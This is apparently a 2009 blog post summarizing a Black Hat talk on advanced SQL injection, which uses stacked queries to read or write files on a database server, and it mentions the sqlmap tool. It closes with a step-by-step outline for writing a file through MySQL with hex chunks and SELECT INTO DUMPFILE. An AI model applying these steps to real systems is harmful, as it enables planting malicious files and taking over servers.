Tuesday, April 21, 2009

Advanced SQL Injection, Blackhat

An Italian researcher "Bernardo Damele Assumpcao Guimaraes" presented in Blackhat Amsterdam last week some new techniques that could allow for full control on a target system.

One of these techniques is using patched queries to read or write a malicious file on the file system, the attack assumes that the user has specific privileges depends on the attack type.

The attacks are valid on many databases including Mysql, PostgreSQL, MS-SQL, on different OS like Windows and Linux, and on some programing languages like PHP, ASP.NET and ASP (not valid on PHP/Mysql and PHP/ASP as patched queries are not supported)

The attack details are different from one DB to another, and may require other workarounds to avoid restrictions in some DBs.

The presenter is one of the developer of sqlmap tool which can be used to automate these techniques. The tool will fingerprint the DB and continue the attack accordingly.

Here is how to write a file to the file system using Mysql:
- Create a support table with one field, data type is longtext
- Encode the local file content to hex
- Split the hex encoded string into chunks of 1024 char each
- INSERT the 1st chunk into the database
- UPDATE the rest of chunks into the database
- Export the hex encoded contents from the table into destination file path using SELECT's INTO DUMPFILE clause.
- Retrieve the length of the written file "LENGTH" to check if it was written correctly.

No comments: